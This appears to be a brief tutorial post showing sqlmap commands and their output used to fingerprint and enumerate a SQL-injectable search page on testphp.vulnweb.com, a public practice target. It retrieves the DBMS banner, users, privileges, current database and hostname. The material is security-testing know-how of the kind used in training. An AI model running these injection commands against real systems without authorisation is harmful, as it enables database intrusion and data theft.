Fingerprinting the system and database
Site: http://testphp.vulnweb.com
——
Link bị lỗi SQL Injection: http://testphp.vulnweb.com/search.php?test=query
Get database & DB version.
root@kali:~# sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –b
|
1 2 3 4 5 6 7 |
[14:04:28] [INFO] the back-end DBMS is MySQL [14:04:28] [INFO] fetching banner web application technology: Nginx, PHP 5.3.10 back-end DBMS operating system: Linux Ubuntu back-end DBMS: MySQL 5 banner: '5.1.73-0ubuntu0.10.04.1' [14:04:28] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com' |
Get user & role.
root@kali:~# sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –users –roles
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
[14:15:23] [INFO] the back-end DBMS is MySQL web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL 5 [14:15:23] [INFO] fetching database users database management system users [1]: [*] 'acuart'@'localhost' [14:15:23] [WARNING] on MySQL the concept of roles does not exist. sqlmap will enumerate privileges instead [14:15:23] [INFO] fetching database users privileges database management system users roles: [*] 'acuart'@'localhost' [1]: role: USAGE [14:15:23] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com' |
Get current user, current database and hostname information.
root@kali:~# sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –current-user –current-db –hostname
|
1 2 3 4 5 6 7 8 9 10 |
[14:16:22] [INFO] the back-end DBMS is MySQL web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL 5 [14:16:22] [INFO] fetching current user current user: 'acuart@localhost' [14:16:22] [INFO] fetching current database current database: 'acuart' [14:16:22] [INFO] fetching server hostname hostname: 'rs202995' [14:16:22] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com' |
Recent Comments